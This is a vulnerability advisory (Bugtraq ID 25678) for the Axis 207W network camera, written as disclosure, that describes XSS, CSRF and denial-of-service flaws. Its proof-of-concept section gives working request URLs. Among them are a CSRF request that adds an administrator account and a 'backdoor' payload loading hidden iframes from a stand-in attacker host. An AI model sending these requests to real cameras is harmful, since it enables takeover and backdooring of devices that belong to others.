Axis Communications 207W Network Camera Web Interface Vulnerabilities
BID:25678
Info
Axis Communications 207W Network Camera Web Interface Vulnerabilities
| Bugtraq ID: | 25678 |
| Class: | Unknown |
| CVE: |
CVE-2007-4930 CVE-2007-4927 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 14 2007 12:00AM |
| Updated: | Jul 06 2016 02:17PM |
| Credit: | Discovery is credited to Seth Fogie. |
| Vulnerable: |
Axis Communications 207W Network Camera 0 |
| Not Vulnerable: | |
Discussion
Axis Communications 207W Network Camera Web Interface Vulnerabilities
Axis Communications 207W Network Camera is prone to multiple vulnerabilities in the web interface. Three issues were reported: a cross-site scripting vulnerability, a cross-site request-forgery vulnerability, and a denial-of-service vulnerability.
Exploiting these issues may allow an attacker to compromise the device or to prevent other users from using the device.
Axis Communications 207W Network Camera is prone to multiple vulnerabilities in the web interface. Three issues were reported: a cross-site scripting vulnerability, a cross-site request-forgery vulnerability, and a denial-of-service vulnerability.
Exploiting these issues may allow an attacker to compromise the device or to prevent other users from using the device.
Exploit / POC
Axis Communications 207W Network Camera Web Interface Vulnerabilities
The following examples were provided:
Cross-site scripting:
http://www.example.com/incl/image_incl.shtml?camNo=</script><script>alert(String.fromCharCode(88,83,83))</script>
Cross-site request forgery:
1. Reboot the camera - http://www.example.com/axis-cgi/admin/restart.cgi
2. Add a new administrator -
http://www.example.com/axis-cgi/admin/pwdgrp.cgi?action=add&user=owner1&grp=axuser&sgrp=axview:axoper:axadmin&pwd=owner1&comment=WebUser&return_page=/admin/users_set.sh
+tml%3Fpageclose%3D1
3. Root the camera/add a backdoor -
http://www.example.com/admin/restartMessage.shtml?server=<iframe%20style=visibility:hidden%20src=http://www.evilserver.com/wifi/axisbd.php><iframe
src=http://www.evilserver.com/wifi/axisrb.htm><!â??
Denial of service:
http://www.example.com/axis-cgi/buffer/command.cgi?do=start&buffername=<unique buffer name>
The following examples were provided:
Cross-site scripting:
http://www.example.com/incl/image_incl.shtml?camNo=</script><script>alert(String.fromCharCode(88,83,83))</script>
Cross-site request forgery:
1. Reboot the camera - http://www.example.com/axis-cgi/admin/restart.cgi
2. Add a new administrator -
http://www.example.com/axis-cgi/admin/pwdgrp.cgi?action=add&user=owner1&grp=axuser&sgrp=axview:axoper:axadmin&pwd=owner1&comment=WebUser&return_page=/admin/users_set.sh
+tml%3Fpageclose%3D1
3. Root the camera/add a backdoor -
http://www.example.com/admin/restartMessage.shtml?server=<iframe%20style=visibility:hidden%20src=http://www.evilserver.com/wifi/axisbd.php><iframe
src=http://www.evilserver.com/wifi/axisrb.htm><!â??
Denial of service:
http://www.example.com/axis-cgi/buffer/command.cgi?do=start&buffername=<unique buffer name>
Solution / Fix
Axis Communications 207W Network Camera Web Interface Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Axis Communications 207W Network Camera Web Interface Vulnerabilities
References:
References:
- Axis 207 Network Camera (Axis Communications)
- Owning the Wireless Camera (and Its User) (InformIT)
- Axis 207W Wireless Camera Web Interface - Multiple Vulnerabilities (Seth Fogie